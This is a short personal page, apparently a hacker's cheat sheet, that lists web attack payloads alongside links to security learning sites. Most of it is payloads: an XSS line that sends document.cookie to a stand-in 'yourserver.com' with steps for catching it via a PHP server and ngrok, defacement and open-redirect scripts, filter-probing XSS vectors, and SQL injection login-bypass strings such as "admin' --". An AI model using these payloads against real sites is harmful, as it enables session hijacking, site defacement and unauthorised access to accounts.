The goal of this page is just to get attention.
Why do i have to seriously write online some payloads when there are already thousands of them online for any type of vulnerability?
Anyway, i suggest these websites to study or review vulns!
https://www.invicti.com/learn/
https://www.hacksplaining.com/lessons
https://portswigger.net/web-security
- Generic XSS payloads
- Various boolean based SQL injection payloads
<script>document.location=“http://yourserver.com/?c="+document.cookie;</script>For example, to start a little server with php and ngrok i do:
php -S localhost:<port>
ngrok http <port>
Achieve Open redirect
<script>window.location="https://example.com"</script><script>window.location="https://example.com"</script>Useful if a deface is needed
<script>document.getElementsByTagName('body')[0].innerHTML="jamal";</script>
<script>document.body.innerHTML = 'jamal';</script>Just search on google, you will find a lot of ways to escape filters
<script>alert("hello")</script>
document.write(location.search("><svg onload=alert(1)>"))
<svg/onload=alert("hi")>
<img src=x onerror="alert('hello');">
<iframe src=”javascript:alert(1)”></iframe>
<var onmouseover="prompt(1)">move the cursor here</var>
<script>alert(window.origin)</script>
<script>alert(document.cookie)</script>
<script>confirm(document.domain)</script>Taken from this website, "Sql injection cheat sheet by invicti" (a read is strongly suggested)
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--